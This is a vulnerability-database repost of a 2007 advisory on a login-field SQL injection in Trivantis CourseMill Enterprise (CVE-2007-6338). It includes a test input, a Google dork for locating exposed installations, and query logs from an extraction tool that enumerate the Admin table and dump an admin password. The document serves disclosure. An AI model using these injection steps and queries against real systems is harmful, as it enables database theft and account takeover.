Vulners
Lucene search
trivantis-sql.txt
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | QuickTime < 7.3.1 Multiple Vulnerabilities | 14 Dec 200700:00 | – | nessus |
 | CVE-2007-6338 | 15 Dec 200701:00 | – | cve |
 | CVE-2007-6338 | 15 Dec 200701:00 | – | cvelist |
 | EUVD-2007-6305 | 7 Oct 202500:30 | – | euvd |
 | CVE-2007-6338 | 15 Dec 200701:46 | – | nvd |
 | Sql injection | 15 Dec 200701:46 | – | prion |
 | + Trivantis CourseMill Enterprise Learning Management System - SQL Injection - CVE-2007-6338 | 16 Dec 200700:00 | – | securityvulns |
| Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 16 Dec 200700:00 | – | securityvulns |
 | FreeWebshop SQL注入漏洞 | 18 Dec 200700:00 | – | seebug |
`+==================================================================================================+
+ Trivantis CourseMill Enterprise Learning Management System - SQL Injection - CVE-2007-6338 +
+==================================================================================================+
DISCOVERED BY:
==============
sasquatch of SecureState - [email protected]
HOMEPAGE:
=========
www.securestate.com
AFFECTED AREA:
==============
The username field on the login page is susceptible to SQL injection...
http://www.website.com/coursemill/userlogin.jsp seems to be the default login page.
Impact: Full data dump of underlying database ---> Username/Passwords ~~~> ???
username: '
password: test
An unrecoverable error has occurred.
Please report this message to your system administrator.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
Exit
©2006 Trivantis Corporation. Trivantis and CourseMill are registered trademarks of Trivantis. All Rights Reserved.
EXPLOITATION:
=============
Exploiter Beta from WatchFire's AppScan eXtensions Framework can be used to pull ALL data from the underlying database.
This is a free tool available from http://axf.watchfire.com/extensions/exploiter.aspx
The logins are unencrypted and stored in the "Admin" table. Column names are: ID, LastLogin, OrgId, Passsword.
This was found during a penetration test and was not tested as to whether or not further exploitation from inside the application is possible.
CONFIRMED AGAINST:
==================
CourseMill Enterprise v.4.1 SP4 (4527) (http://www.trivantis.com/products/coursemill.html)
EXAMPLE GOOGLEDORK:
===================
"Trivantis and CourseMill are registered trademarks of Trivantis"
VENDOR INFORMATION:
===================
Trivantis Corporation
311 Elm Street Suite 200
Cincinnati, OH 45202
877-929-0188
513-929-0188
http://www.trivantis.com
Vendor notified on 12-13-07 and the product development manager was uncooperative and hung up on us.
Sample Query Logs from Exploiter Beta:
======================================
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin')
Column found: table=Admin, column=ID
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'ID'
Column found: table=Admin, column=LastLogin
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'LastLogin'
Column found: table=Admin, column=OrgId
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'OrgId'
Column found: table=Admin, column=Password
QUERY = SELECT MIN(isnull(name,'')) FROM syscolumns WHERE xtype NOT IN (173,34,98,165,60) AND id=(SELECT id FROM sysobjects WHERE name='Admin') AND name>'Password'
Extracting records for table=Admin...
Exploit method is now Convert
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT ID)) FROM Admin
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT LastLogin)) FROM Admin
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT OrgId)) FROM Admin
QUERY = SELECT TOP 1 convert(nvarchar(16),COUNT(DISTINCT Password)) FROM Admin
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(ID,'')))) FROM Admin
Value found: table=Admin, column=ID, value=admin
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(LastLogin,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin'
Value found: table=Admin, column=LastLogin, value=Oct 7 2007 2:45AM
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(OrgId,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin'
Value found: table=Admin, column=OrgId, value=
QUERY = SELECT MIN(RTRIM(convert(nvarchar(255),isnull(Password,'')))) FROM Admin WHERE RTRIM(convert(nvarchar(255),isnull(ID,'')))='admin'
Value found: table=Admin, column=Password, value=admin
Etc...
and proceeds to dump the entire database...
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Dec 2007 00:00Current
6.7Medium risk
Vulners AI Score6.7
EPSS0.00754